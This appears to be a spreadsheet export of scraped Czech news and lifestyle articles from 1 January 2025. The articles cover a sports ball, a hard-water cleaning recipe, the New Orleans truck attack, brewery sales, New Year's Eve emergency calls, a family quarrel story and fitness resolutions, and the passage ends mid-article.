Všem děkujeme za podporu a těšíme se na vás na Všesportovním plese v roce 2025.Sehraný kolektiv pořadatelek a pořadatelů pro vás připravuje nejlepší ples sezony 2024-2025. A jak to všechno bude? Letos přicházíme s jednou velkou změnou, po 14 ročnících jsme se rozloučili se skvělým Big´O´Bandem, který nahradí neméně skvělý band Kohoutí stopa. Lístky: Olinka Kahánková (pro příště OK), DPD , tel. č.: 483 382 430, 727 806 218 od 9. prosince 2024 Kolik zaplatíte: příspěvek na mladé smržovské sportovce 300 Kč + 15 Kč vstupné (kontrolní součet 315 Kč). Krásy noční oblohy Výstava fotografií Jakuba Kuřáka ve výstavní síni Zámečku. „Výstava Krásy noční oblohy odhaluje příběhy a události ukryté ve fotografiích, které zachycují krásy noční oblohy tak, jak je vidíme my ze Země. Prostřednictvím těchto fotografií si můžeme ukázat nezvyklé úkazy nebo také každodenní oblohu, kterou ve městech nemáme šanci vidět." Více informací www.smrzovka.cz nebo 483 369 325. Sdílet s přáteli na facebooku Jambo, Keňo!: Výstavní síň ve Smržovce ukáže krásy Afriky Všesportovní ples Autor: Paulina Havlasová Autor person Paulina Havlasová</t>
  </si>
  <si>
    <t>20250101_249_3695097165_5d36d8a47a3fc587bd56.html</t>
  </si>
  <si>
    <t>5d36d8a47a3fc587bd56</t>
  </si>
  <si>
    <t>Silná směs k čištění skvrn od tvrdé vody: Vyřeší zarostlé baterie u dřezů i sprch</t>
  </si>
  <si>
    <t>Silná směs k čištění skvrn od tvrdé vody: Vyřeší zarostlé baterie u dřezů i sprch info Profimedia / Profimedia Kristýna Stoklásková 1. 1. 2025 clock 3 minuty video Každý to známe. Kovové baterie v kuchyni nebo koupelně, které kdysi zářily novotou, teď pokrývají nevzhledné skvrny. Vodní kámen, usazeniny a stopy tvrdé vody dokážou udělat pěknou neplechu. Můžete drhnout a drhnout, ale výsledek často není podle vašich představ. Co s tím? Minerály z vody se přirozeně usazují na površích a zanechávají bílé skvrny, které není snadné odstranit. Pokud nechcete utrácet za drahé čisticí prostředky plné chemie, máme pro vás lepší řešení. Domácí směs na bázi alkoholu , mýdla a vody je levná, ekologická, a hlavně opravdu funguje. Podívejte se na video z YT tvorby kanálu Andrea Jean Cleaning – Jak odstranit skvrny od tvrdé vody Zdroj: Youtube Jak si tuto směs připravit Budete potřebovat čistou lahev s rozprašovačem. Do ní nalijte půl sklenice vody a přidejte čtvrt sklenice čistého alkoholu . Může to být například líh, který snadno seženete v drogerii. Nakonec přidejte dvě lžičky tekutého mýdla. Celou směs dobře protřepejte, aby se všechny složky spojily. Tím je čistič připravený k použití. Použití je jednoduché. Stačí nastříkat směs na znečištěná místa a nechat ji několik minut působit. Alkohol začne rozkládat minerální usazeniny, zatímco mýdlo odstraní mastnotu a další nečistoty. Poté si vezměte měkkou houbičku nebo hadřík a povrch jemně otřete. Pokud jsou skvrny obzvlášť odolné, můžete postup zopakovat. Nakonec opláchněte vodou a povrch osušte. Výsledek vás mile překvapí. close Profimedia / Profimedia zoom_in Osvojte si nový zvyk a po osobní hygieně po sobě utřete baterii, sprchový kout setřete stěrkou a umyjte dřez, když umyjete nádobí. Úklid tak bude mnohem jednodušší. Související články Němá hůl je nádherná a užitečná pokojovka: Když si ale nedáte pozor, ohrozí vás na životě video Tento domácí čisticí prostředek má několik výhod. Nejenže je šetrný k povrchům, ale zároveň šetří vaše peníze i životní prostředí. Nemusíte kupovat drahé prostředky plné agresivních chemikálií, které často povrchům spíše škodí. Směs, kterou si připravíte doma, je stejně účinná a navíc bezpečnější. Vaše baterie i sprchová hlavice si zaslouží trochu péče a vy zas ušetříte čas i nervy. Osvojte si nový zvyk Chcete, aby vaše koupelna i kuchyň zůstaly déle čisté bez zbytečné námahy? Stačí si osvojit jednoduché triky, které fungují lépe, než si možná myslíte. Po sprchování setřete vodu ze stěn sprchového koutu stěrkou a následně povrchy jemně osušte suchým hadříkem. Podobně můžete po každém použití otřít dřez nebo baterii. Tak zabráníte tomu, aby se voda odpařila a zanechala po sobě skvrny. Pokud vás tvrdá voda trápí často, můžete zvážit i pořízení změkčovače vody, který odstraní minerály způsobující nevzhledné nánosy. S trochou prevence bude vaše domácnost stále zářit a úklid se stane mnohem jednodušší.</t>
  </si>
  <si>
    <t>125930</t>
  </si>
  <si>
    <t>20250101_25_3697866688_368169655786942e646a.html</t>
  </si>
  <si>
    <t>368169655786942e646a</t>
  </si>
  <si>
    <t>V New Orleans vjel řidič auta do lidí, deset jich zabil, FBI to má za terorismus</t>
  </si>
  <si>
    <t>V New Orleans vjel řidič auta do lidí, deset jich zabil, FBI to má za terorismus Policisté na na ulici Bourbon Street ve městě New Orleans , kde nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku. Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. 1. ledna 2025. This content is intended for editorial use only. For other uses, additional clearances may be required. AP/Gerald Herbert New Orleans ( USA )/ Praha - Deset lidí dnes zemřelo a dalších nejméně 35 osob utrpělo zranění ve městě New Orleans poté, co nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku, uvedla americká média. Federální úřad pro vyšetřování ( FBI ) incident vyšetřuje jako terorismus. Útočník je podle něj mrtev. Podle médií měl podezřelý v době incidentu u sebe vlajku Islámského státu. České ministerstvo zahraničí nemá informace o tom, že by se nešťastná událost nějak dotkla českých občanů, sdělil ČTK mluvčí Daniel Drake . Policie již dříve uvedla, že řidič si zřejmě počínal úmyslně. Starostka New Orleans LaToya Cantrellová čin označila za "teroristický útok", ale dodala, že vyšetřování pokračuje. "Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to velmi úmyslné chování," řekla novinářům Anne Kirkpatricková z neworleanské policie. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Kirkpatricková také uvedla, že většina zraněných jsou místní obyvatelé, nikoli návštěvníci města. "Spolupracujeme s našimi partnery na vyšetřování tohoto útoku jako teroristického činu," uvádí se v prohlášení FBI , který případ převzal. FBI rovněž potvrdil předchozí informaci televize CNN a agentury AP, že podezřelého z útoku policie zastřelila. "Dotyčný zaútočil na příslušníky orgánů činných v trestním řízení a nyní je po smrti," uvedl úřad. Podezřelý měl v době incidentu vlajku teroristické organizace Islámský stát, uvedla CNN s odvoláním na zdroje z bezpečnostní komunity. Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. Podle stanice CNN vyšetřovatelé FBI ověřují i možnost, že ve voze bylo funkční výbušné zařízení. "Byla nalezena improvizovaná výbušná zařízení a snažíme se potvrdit, zda byla použitelná," citovala CNN kancelář FBI v New Orleans . Podle agentury AP nalezli policisté také pistoli a útočnou pušku. Americký prezident Joe Biden v prohlášení Bílého domu uvedl, že nařídil vyčlenit veškeré zdroje potřebné pro vyšetření případu. Uvedl také, že žádný útok na Američany nebude tolerován a že násilí v jakékoliv podobě není ospravedlnitelné. Zvolený prezident Donald Trump , který se úřadu ujme 20. ledna, útok bez konkrétních podrobností spojil s nelegální migrací. Svůj příspěvek ohledně událostí v New Orleans začal větou, že "příchozí zločinci jsou daleko horší než zločinci, které máme v naší zemi". Neuvedl ale, jak tento případ souvisí s migrací. "Naše ambasáda i honorární konzul v New Orleans jsou v kontaktu s místními úřady a situaci monitorují. Nemáme informace o tom, že by se nešťastná událost nějak dotkla českých občanů," sdělil ČTK mluvčí české diplomacie Drake . USA neštěstí FLEŠ Autor: AP, Gerald Herbert Autoři person AP person Gerald Herbert</t>
  </si>
  <si>
    <t>20250101_250_3695075797_05d90cc10dbcd20926a8.html</t>
  </si>
  <si>
    <t>05d90cc10dbcd20926a8</t>
  </si>
  <si>
    <t>Obliba piva Bernard roste. Prodalo se ho nejvíce v&amp;nbsp;historii</t>
  </si>
  <si>
    <t>Obliba piva Bernard roste. Prodalo se ho nejvíce v&amp;nbsp;historii Praha 1. ledna 2025 Rodinný pivovar Bernard v roce 2024 vystavil 419 tisíc hektolitrů piva , nejvíce za 33 let existence. Je to o 10 tisíc hl více než v předchozím roce. Produkce pivovaru jde proti vývoji na trhu, kde prodej piva dlouhodobě postupně klesá. Dvě třetiny piva Bernard vyčepují restaurace a hospody ze sudů, třetina se prodá v lahvích, přitom na českém trhu je poměr opačný. „Každý rok se vypořádáváme s dalšími překážkami, od covidu přes skokové nárůsty cen energií a surovin, válku na Ukrajině , zvýšení daní, nekončící bujení administrativy až po povodně, jejichž dopad jsme také pocítili. Přesto se nám daří růst. Nemáme to zadarmo, je za tím píle a poctivá práce. Proto nás opravdu těší, že si naše pivo vybírá stále více lidí,“ hodnotí vývoj generální ředitel a vrchní sládek Josef Vávra. „Od počátku usilujeme o co nejvyšší kvalitu piva a služeb a naše snaha přináší výsledky. Věřím v poctivou práci a dobré vztahy s obchodními partery a zákazníky. Má smysl jít vlastní cestou v marketingu a mít schopné obchodníky, kterým se daří nacházet nová odbytiště, i když řada provozoven v posledních letech padla,“ ohlíží se za uplynulým rokem také spolumajitel pivovaru Stanislav Bernard , podle kterého se aktuálními výsledky pivovar přiblížil na hranu svých kapacit. Růst pozastavil pouze covid Výstav Rodinného pivovaru Bernard se kontinuálně zvyšuje od roku 2001 (95 tisíc hl.). Hranici 400 tisíc hektolitrů se mu podařilo přesáhnout poprvé v roce 2019, v následujících letech ovšem přišel pokles prodeje v důsledku opatření proti šíření covidu (zavírání hospod apod.). V roce 2022 byl výstav pivovaru bezmála 398 tisíc hektolitrů, v roce 2023 už 409 tisíc hektolitrů piva . Rodinný pivovar Bernard sídlící v Humpolci na Vysočině exportuje 21 procent své produkce do 25 zemí světa, nejvíce na Slovensko , do Švédska a do Bulharska . Zaměstnává 267 lidí, dalších 28 osob má práci v humnové Sladovně Bernard v Rajhradě u Brna . V roce 2022 pivovar otevřel ve svém areálu Návštěvnické centrum Bernard . V roce 2024 se v soutěži Společnosti přátel piva stal už poosmé pivovarem roku. www.bernard.cz | FB: www.facebook.com/bernard.cz Radek Tulis Autor: Svetozár Plesník Autor person Svetozár Plesník Rubrika transition_slide Ekonomika</t>
  </si>
  <si>
    <t>1160</t>
  </si>
  <si>
    <t>20250101_251_3695069124_34680d02021e0b6fddd9.html</t>
  </si>
  <si>
    <t>34680d02021e0b6fddd9</t>
  </si>
  <si>
    <t>Rvačky, opilci, pyrotechnika, bosý muž, zaběhlí psi. Kraj vítal rok 2025</t>
  </si>
  <si>
    <t>Rvačky, opilci, pyrotechnika, bosý muž, zaběhlí psi. Kraj vítal rok 2025 Do silvestrovské půlnoci panoval v kraji relativní klid. Pak to ale vypuklo… Jen policisté měli za prvních pět hodin 210 výjezdů, přičemž běžný denní průměr činí 300. Sledujte s Deníkem práci našich hasičů, policistů a záchranářů. | Video: HZS , ZZS a Policie Moravskoslezského, Zlínského a Olomouckého kraje „Spektrum oznámených věcí bylo opravdu široké. Policisté řešili případy výtržností i narušení veřejného pořádku, zaznamenali jsme fyzická napadání v bytech, barech, restauracích i ve venkovním prostředí. Asi nepřekvapí, že v mnoha případech hrál svou roli alkohol . Máme hlášeny skutky majetkové, dále například i ztrátu všech dokladů. Kolem půlnoci a v prvních chvílích nového roku si prim v oznámeních na linku 158 držela jednoznačně volání ohledně rušení nočního klidu a používání pyrotechniky,“ uvedla Soňa Štětínská z moravskoslezské policie s tím, že došlo i ke zranění při používání pyrotechniky. „Zhruba čtvrt hodiny po půlnoci se rozhodl ani ne dvacetiletý muž oslavit v Havířově příchod nového roku zábavní pyrotechnikou,“ uvedla Soňa Štětínská. Když se po zapálení knotu nic nedělo, pokusil se dotyčný o opětovné zapálení. V té chvíli došlo k explozi. Muž byl se zraněním hlavy předán zdravotníkům. Neštěstí nešlo o závažné poranění. Pyrotechnika způsobovala i materiální škody. V Ostravě - Porubě vybuchla petarda pod autem. Policisté také vyjížděli na oznámení o podivném muži, který v Ostravě - Porubě pobíhal venku bosý. Jak se ukázalo, zabouchl si dveře. Policisté na Opavsku pomohli muži, který si pár minut po půlnoci ponechal klíče ve vozidle, jež se uzamklo. Ostravsko Během silvestrovských oslav se nezastavili ani strážníci. Kromě veřejného pořádku je zaměstnávali i pobíhající psi. „Kolegům z městské policie jsme předávali několik oznámení typu nález opuštěného psa nebo informaci o psovi, který spadl do díry a uvízl v ní,“ doplnila Soňa Štětínská. Moravskoslezští záchranáři od půlnoci do ranních hodin 1. ledna ošetřovali přes pět desítek zraněných. Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci měla v sobě větší množství alkoholu , což je obdobný počet jako v uplynulých letech. „Další zhruba tři desítky ošetřovaných osob posádkám uvedly, že byly napadeny a zraněny jinou osobou, nebo utrpěly poranění při potyčkách. Také většina z nich jevila známky ovlivnění psychotropní látkou. Mezi mechanismy napadení patřily údery lahvemi, tyčemi a dalšími předměty,“ uvedl mluvčí krajských záchranářů Lukáš Humpl. Ostravsko S diagnózou opilosti či těžké opilosti muselo záchrannou službou během silvestrovského večera a noci ošetřeno šestnáct osob. Během novoročních oslav zasahovali moravskoslezští záchranáři u osmi událostí vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny. Hasiči v Moravskoslezském kraji od půlnoci do rána evidovali 74 mimořádných událostí, z toho 58 požárů. Šlo zejména o zapálené popelnice, kontejnery a křoviny. Co se týká pyrotechniky, kvůli ní vyjížděli šestnáctkrát. Autor: Jaroslav Perdoch Autor Jaroslav Perdoch</t>
  </si>
  <si>
    <t>20250101_252_3695079732_c354d91d956a1726ee1b.html</t>
  </si>
  <si>
    <t>c354d91d956a1726ee1b</t>
  </si>
  <si>
    <t>Tomáš (34): Silvestrovská hra odhalila tajemství, která zničila rodinnou pohodu. Takové drama jsem nečekal</t>
  </si>
  <si>
    <t>Tomáš (34): Silvestrovská hra odhalila tajemství, která zničila rodinnou pohodu. Takové drama jsem nečekal Tomáš se svými blízkými každoročně slaví Silvestr v rodinném kruhu. Tento rok se však rozhodli oslavit příchod nového roku netradičně hrou. To, co mělo být zábavou, se nakonec pořádně zvrtlo. Naše rodinné silvestrovské oslavy byly vždycky poklidné . Sejdeme se u rodičů, povídáme si, jíme chlebíčky a těšíme se na ohňostroj. Letos jsme ale chtěli něco jiného. Mohlo by Vás zajímat: Kamila (34): Rodinný Silvestr nám nevyšel, manžel udělal z našeho domu hospodu Hra, která to všechno odstartovala Můj mladší bratr Dan navrhl, že si zahrajeme hru „Pravda nebo lež“. Mělo to být zpestření večera. Nikdo netušil, že tím spustíme lavinu problémů. „Dobře, teď já,“ řekla švagrová Veronika a podívala se na bráchu Dana se zvláštním úsměvem. „Pravda, nebo lež: Jednou jsem utratila peníze za tajný výlet, aniž bych ti o tom řekla.“ Dan ztuhl. „To není pravda, viď?“ zeptal se. Veronika ale klidně odpověděla: „Je to pravda.“ V tu chvíli napětí vzrostlo. Dan na ni zvýšil hlas: „Tys jezdila na výlety za naše peníze a nic jsi mi neřekla?“ Veronika se ale bránila: „Vždyť to bylo dávno, navíc to bylo moje rozhodnutí!“ Ale Dan byl rozčilený. „A co ještě přede mnou tajíš?“ zasyčel a atmosféra u stolu zhoustla. Mohlo by Vás zajímat: Anna (24): Zrada na Silvestra! Přítele jsem přistihla s cizí ženou, z nevěry se snažil trapně vylhat Má otázka vše ještě zhoršila Snažil jsem se situaci uklidnit a přišla řada na mě. „Pravda, nebo lež: Někdo v této místnosti tají něco, co by ostatní měli vědět.“ Nastalo ticho. Sestra Klára se na mě zamračila: „Co tím myslíš?“ váhavě se zeptala. Cítil jsem tlak a pokračoval: „Třeba to, že někdo tady podvádí svého partnera.“ V tu chvíli se švagr Marek začal ošívat. Klára na něj podezřívavě pohlédla: „Marku? Co to má znamenat?“ Marek zrudnul a zakoktal: „To je nesmysl, Tomáš jen vymýšlí hlouposti.“ Ale Klára byla rozhořčená. „Takže provokuje, nebo je to pravda?“ V tu chvíli bylo jasné, že věci naberou špatný směr . Mohlo by Vás zajímat: Jiří (54): Čekají mě pekelné Vánoce. S manželkou jsme se pohádali už při kupování stromku Celá rodina se pohádala Dan a Veronika se dál hádali o peníze, Klára se pustila do Marka a naše máma už to nevydržela a začala plakat: „Proč se musíte pořád hádat? Nemůžeme jednou oslavit Silvestr jako normální rodina?“ Táta mezitím mlčky upíjel víno , ani se nesnažil zasáhnout . Večer skončil katastrofálně. Nikdo si už nepřipil na nový rok a všichni odcházeli rozladění. Na Nový rok jsme si ani nepopřáli. Pořád ale doufám, že se vše urovná a příště už se do podobných her nebudeme pouštět. Další příběhy ze života → Mohlo by Vás zajímat: Bořek (32): U zdobení stromku jsme se pohádali a žena prohlásila, že Vánoce ruší. Ulevilo se mi Text byl zpracován na základě skutečného příběhu, fotografie je jen ilustrační. Máte podobnou zkušenost? Svěřte se nám se svým příběhem, napište na redakce@lifee.cz . Jak jíst v padesáti, abyste si jídlo užívaly a nepřibíraly: Rady oblíbených gurmánek Dity a Karolíny Autor: Nina Svobodová Autor person Nina Svobodová</t>
  </si>
  <si>
    <t>20250101_253_3695086110_0d49eab10ff8b4e5a37d.html</t>
  </si>
  <si>
    <t>0d49eab10ff8b4e5a37d</t>
  </si>
  <si>
    <t>Vezmi letos svoje novoroční předsevzetí za správný konec!</t>
  </si>
  <si>
    <t>Vezmi letos svoje novoroční předsevzetí za správný konec! 01.01.2025 22 minut čtení Je tady další nový rok a s ním i tradiční předsevzetí. Dáváte si už X let za cíl, že od ledna konečně začnete žít zdravě, pravidelně sportovat, zhubnete ta přebytečná kila, uběhnete maraton, nebo změníte stravovací návyky, ale rok, co rok v půlce ledna končíte, protože nezvládnete na první pokus zvolit tu správnou cestu bez přehnaného omezení, nadměrných restrikcí, zbytečného přetěžování a příliš radikálních změn? A co to letos zkusit jinak? Sepsali jsme pro vás nejdůležitější tipy, kterých se můžete držet a dotáhnout tak svoje předsevzetí do zdárného konce! Stanovte si reálné cíle Tak jo, pojďme na to úplně od začátku. Ohromná spousta novoročních cílů ztroskotá na tom, že jsou zkrátka úplně nereálné. Chcete shodit rychle a snadno, nabrat 10 kg svalů nebo za měsíc uběhnout maraton? No, tak zase zpátky na zem. Proces změny těla, ať už v jakémkoliv směru, není chvilková záležitost, vyžaduje úsilí, vytrvalost, pevnou vůli, a především právě rozumný přístup. Problém je, že mnoho začátečníků se zdravým životním stylem nedokáže odhadnout, jak vlastně takový reálný cíl vypadá. Tak si pro začátek zkuste si stanovit nějaký spíše menší, snáze dosažitelnější cíl a postupně ho posouvejte dál a dál… ono totiž ve finále zjistíte, že cesta je cíl a že je pořád na čem pracovat. Jen je potřeba si to neznechutit hned na začátku. Navíc ve chvíli, kdy si na začátku stanovíte menší cíl, který se vám povede snáze a dříve naplnit, podpoří to i vaší motivaci a nadšení. Nemusíte všechno zvládnout první týden v lednu Pokud se po x letech chystáte změnit svůj životní styl, začít jíst zdravě a pravidelně sportovat, nebuďte na sebe příliš hrrrr a nečekejte, že všechno zvládnete první týden na jedničku. Raději, než se pustit do nějaké enormně radikální změny, na to jděte postupně. Nemusíte hned nárazově omezit všechny potraviny, které máte rádi. Úpravy jídelníčku dělejte postupně. Začněte tím, že se naučíte pít dostatek čisté vody a přidáte do jídelníčku více zeleniny a ovoce. Pomalu omezujte konzumaci sladkostí a fastfoodu a místo toho experimentujte, zkoušejte zdravé recepty a hledejte alternativy ke svým oblíbeným ne-až-tak vhodným potravinám do zdravého jídelníčku. A to samé platí ve sportu: pokud jste nikdy nechodili do fitka nebo běhat, nečekejte, že z vás za dva týdny bude profík. Naopak – začátky ve sportu jsou náročné a dost často i bolavé, což může mnoho lidí odradit. Tak raději, než přepálit začátek a sportovat 7x týdně, si dejte tréninky tři a dopřejte tělu čas na regeneraci a nechte ho si na pohyb zvyknout. Pak můžete tréninky klidně přidat. 13 minut čtení Každá změna potřebuje svůj čas Kromě toho, že si lidé dávají nereálné cíle, také často předpokládají, že změny přijdou rychle – ideálně hned. Jak nevidí po prvním týdnu alespoň o dvě kila na váze méně, nemají o tři centimetry větší biceps, nebo nezvládnou uběhnout 2 km bez zadýchání, svoje snahy vzdávají, protože jejich plán „nefunguje“. Je potřeba uvědomit si jednu věc – každá transformace a každý sportovní cíl vyžaduje svůj čas, silnou vůli, disciplínu, konzistentnost a v neposlední řadě i trpělivost. Svá kila jste jistě nenabrali za týden, a proto nemůžete čekat, že se jich za týden zbavíte. Pokud jste nikdy neběhali, nemůžete čekat, že z vás za týden bude druhý Bolt. A pokud začínáte se silovým tréninkem, bude vás po týdnu spíše všechno bolest, než že byste zaznamenali nějaký enormní nárůst svalové hmoty. To, jak dlouho bude trvat naplnění vašeho cíle, závisí na mnoha faktorech – na jeho velikosti, charakteru, stravovací či tréninkové historii, na genetice, a především na vás samotných. Připravte se na to, že každé tělo je jedinečné a u každého proces redukce nebo nabírání kondice probíhá úplně jinou rychlostí. Může být demotivující vidět, že lidé ve vašem okolí shazují kila lusknutím prstu a vám to zkrátka tak dobře nejde, nebo že někomu jde kondice nahoru rychleji než vám... ale zkuste se neporovnávat a soustřeďte se na to, že to, co děláte, děláte především pro sebe. Ikdyž to možná občas bude těžké, když vydržíte a nevzdáte se, bude to za to stát. Dejte tělu čas přizpůsobit se novému režimu a na všechny změny reagovat. Ani Řím nezvládli postavit za jednu noc! 2 minuty čtení Zkratky neexistují, tečka. Jedním z kroků, které obvykle začátečníci ve výživě udělají, je, že se uchýlí k nějaké drastické, příliš restriktivní nebo zbytečně monotónní dietě, kterou najdou na internetu, nebo si ji vyhlídnou u nějaké modelky či bloggerky na instagramu. Takové diety, případně univerzální manuály stažené z internetu, ale absolutně neodpovídají jejich potřebám, a to je hlavním důvodem, proč takové pokusy o redukci tuku obvykle končí neúspěchem, jojo efektem a někdy dokonce zdravotními problémy. Pokud vám můžeme poradit, nehledejte žádné svaté grály a začněte rovnou budovat stravovací směr, který bude po všech směrech vyhovovat vašim osobním potřebám a pomůže vám naplnit vytyčené cíle. Jak si tedy jídelníček poskládat, aby byl funkční a opravdu vyvážený? Uf, tak to by vydalo na samostatný článek, takže to vezmeme tak trochu hopem. Prvním, a vůbec nejdůležitějším, krokem je, si uvědomit, že musí být založený na vašich individuálních potřebách. Měl by reflektovat vaše potřeby, fyzické dispozice, zaměstnání, denní program, intenzitu a četnost sportovních aktivit, jejich charakter, ale taky vaše chuťové preference a konkrétní cíle… zkrátka – je to trochu alchymie, ale měl by reflektovat vás samotné. Neměl by se odvíjet od toho, jak jí váš oblíbený Influencer, ani od toho, co je zrovna in. Jeho dodržování by pro vás mělo být přirozené a nemělo působit tlak nebo stres. A neméně důležité je to, že by vám vlastní jídelníček měl chutnat, měl by vás bavit a měl by pro vás být dlouhodobě udržitelný. Proto by měl být založený na jednoduchosti, kvalitních surovinách v dostatečném množství a taky být dostatečně flexibilní. Měl by obsahovat všechny makroživiny v optimálním poměru, které vaše tělo potřebuje. Základem by měl být dostatek lehce stravitelných bílkovin, jejichž zdrojem jsou všechny druhy masa, ryby, vajíčka, mléčné výrobky, ale také luštěniny, tofu, tempeh nebo třeba proteinový prášek. Bílkoviny bychom měli doplnit také adekvátním množstvím komplexních sacharidů. Ty najdeme v rýži, těstovinách, celozrnném pečivu, ovesných vločkách, bramborách, ale také třeba v pohance nebo quinoe. Neměla by chybět ani vláknina, kterou velkém obsahuje zelenina, ovoce, luštěniny, ovesné vločky a celozrnné produkty. No a na závěr tu máme tuky - přidejte do jídelníčku avokádo, tučnější ryby, olivový olej, oříšky nebo semínka. Tomu, jak by měl takový zdravý jídelníček vypadat, co by měl obsahovat a kde čerpat informace, se budeme brzy věnovat v samostatném článku, protože je to opravdu poměrně obsáhlé téma. V rámci doporučení tu ale nebudeme od boku střílet žádná konkrétní, ani nekonkrétní čísla, kolik kalorií přijímat, protože žádné univerzálně platné doporučení v tomto směru opravdu neexistuje. Pokud si s nastavením jídelníčku nevíte rady, chcete vyhnout zbytečným chybám nebo extrémnímu deficitu, nebojte se oslovit nějakého odborníka, který vám s přípravou jídelníčku pomůže. Nicméně i v tomhle směru pozor, protože není odborník, jako odborník a vysoký počet sledujících na instagramu není zárukou skutečného vzdělání. 20 minut čtení Nenechte se zlákat reklamou na předražené doplňky stravy, které nefungují Pro prodejce různých rádoby pomocníků na hubnutí jsou nováčci ve výživě a jejich předsevzetí naprosto jednoduchým terčem. Proto se v lednu mailové schránky, webové magazíny, ale i sociální sítě hemží reklamami na nejrůznějšími detox programy, zeleninové šťávy, jídla v prášku, hubnoucí čaje nebo jiné kouzlené pilule. Obaly těchto produktů slibují rychlejší úbytek tuku, odstranění toxinů z těla a další zázraky. Ale nalijme si čistého vína – žádný čaj, pilulka ani náhražka jídla za vás tu nejtěžší práci neudělají a nikdy nefungují sami o sobě, byť to jejich obaly obvykle slibují. Svou lednovou cestu za štíhlejším já opravdu nemusíte začínat detoxikačním programem. Pokud totiž vlastníte zdravá játra, ledviny, plíce a další orgány vylučovací soustavy, detoxikujete nepřetržitě - 24 hodin, 7 dní v týdnu, 365 dní v roce. A pokud nežijete nezřízeným životem, nekouříte, neužíváte návykové látky, nekonzumujete pravidelně velké množství alkoholu a nezapíjíte každý den obědové menu ve fastfoodu sklenkou přepáleného oleje, pak vaše tělo v pohodě detoxikaci zvládne samo a nemusíte mu ničím pomáhat. Užíváním pilulek nebo aplikací detoxikačních kúr často uděláte mnohem víc škody než užitku a svou redukci nijak nepodpoříte. Vlastně spíš naopak. Detoxikační programy jsou totiž často založené na extrémním omezení kalorického příjmu, které sice k úbytku váhy povede, ale za jakou cenu. Kromě toho, že váhový úbytek bude způsobený pouze odvodněním, po návratu ke klasickému stravování se váha vyhoupne zpět na původní hodnotu, dokonce možná i s něčím malým navíc, aby si tělo udělalo zásobu pro případ, kdy by vás podobné kraviny napadly ještě někdy jindy. A co se týče nejrůznějších pilulek, čajů a koncentrátů.. Detoxikační produkty sice slibují rychlejší úbytek váhy a vyčištění těla od toxinů, atd., ale upřímně… jediné, co tyhle produkty opravdu vyčistí, je obsah vaší peněženky. Penízky raději investujte do kvalitního jídla, permanentky do fitka, nových bot nebo nějakého tréninkového oblečení. Uděláte tím sobě i svému zdraví mnohem větší službu! 18 minut čtení Pravidelně se hýbejte Pohyb je důležitý nejen pro redukci, ale i pro zdraví jako takové. V určité formě bychom se mu věnovat každý den – tedy alespoň jeho nejzákladnější a nejpřirozenější podobě, kterou je chůze. Kromě toho, že pohybem spalujeme kalorie a budujeme svalovou hmotu, je navíc jakákoliv pohybová aktivita také skvělým způsobem, jak si zlepšit náladu, vyčistit si hlavu a zbavit se stresu, protože se při jeho vykonávání uvolňují endorfiny, hormony štěstí. Aby toho nebylo málo, tak nám pravidelný pohyb může pomoci zvýšit kvalitu našeho spánku, který je klíčový nejen pro redukci, ale právě i pro celkové zdraví. No a jaký pohyb je ten nejlepší? Jednoduše ten, který vás bude bavit nejvíce, bude vám přinášet výsledky a budete schopni jej provozovat pravidelně. Plavání, běh, posilovna, kolo, brusle, box nebo třeba tanec? Dělejte to, co vás skutečně baví a naplňuje štěstím! Vhodné je pohyb také často variovat, zatěžovat tak tělo z nejrůznějších úhlů a dávat mu neustálé podněty k růstu i zlepšování. Nezapomínejte ale ani na náležitý odpočinek. Obzvláště, pokud vaše tělo není na nějakou intenzivnější aktivitu ještě zvyklé, možná bude po prvních trénincích bolavé a unavené. To je naprosto v pořádku, ale není potřeba to s tím pohybem úplně přehánět – dopřejte tělu prostor pro regeneraci, není kam spěchat. Poradíme ti, jak být po celý rok zdravý | Tipy do diety | Začni se zdravým pohybem Kvalitní spánek v dostatečném množství jako jedna z priorit Když už se bavíme o té regeneraci, nutně musí zaznít to, že je potřebujete spát. Potřebujete spát dostatečně co do kvality i kvantity. Během spánku totiž regenerují naše bolavé svaly, ale i další buňky, orgány a také během spánku dochází k vyrovnávání hladin hormonů, což je důležité například i pro úspěšnou redukci. Kvalitní a dostatečný spánek je jedním z hlavních pilířů celkového zdraví, tak z něj pojďte v roce 2023 udělat prioritu. Vedle jídelníčku, dostatečného pitného režimu, pravidelné pohybové aktivity, je i spánek opravdu nesmírně důležitý pro celé naše tělo, výkony v práci i ve fitku, štíhlou linii i pro silnou imunitu. Byť bude optimální doba spánku pro každého z nás trochu jiná, obecně se udává, že bychom spánku měli věnovat alespoň 7-9 hodin denně. 18 minut čtení Nezapomínejte na pravidelnou dávku čerstvého vzduchu Vlivem rostoucích nároků dnešní doby, zvyšující se popularity sociálních sítích a nekončící oblibě pozorování televize, naše generace tráví venku stále méně a méně času, a to je ohromná škoda. Kromě toho, že je procházka přírodou skvělým způsobem, jak si protáhnout tělo, vyčistit hlavu, podpořit produktivitu a načerpat do plic čerstvý vzduch, je také každodenní pobyt venku velmi důležitý pro celkové zdraví. Pomáhá budovat silnou imunitu, hraje důležitou roli pro kvalitu spánku, slouží jako prevence depresí a přes léto při něm zase doplníme veledůležitý vitamín D. Tak pojďte letos venku zase trávit trochu víc času. Dopřejte si procházku cestou ráno do práce, vytáhněte kolegy na oběd mimo kancelář, místo sledování televize vezměte rodinu na odpolední vycházku, vyrazte ven za nějakým sportem, nebo si prostě nazujte boty a běžte ven jen tak. Vaše tělo i hlava vám poděkují a půl hodiny denně na to, abyste mohli jít ven, jistě najdete. Nejen fyzická, ale i psychická péče je důležitá Poslední roky nás naučily, že zdraví není jen o tom fyzičnu, ale i o psychice. Stres je něco, co se dotýká života každého z nás a je potřeba umět s ním pracovat. V určité míře je totiž neškodný, ba dokonce prospěšný, 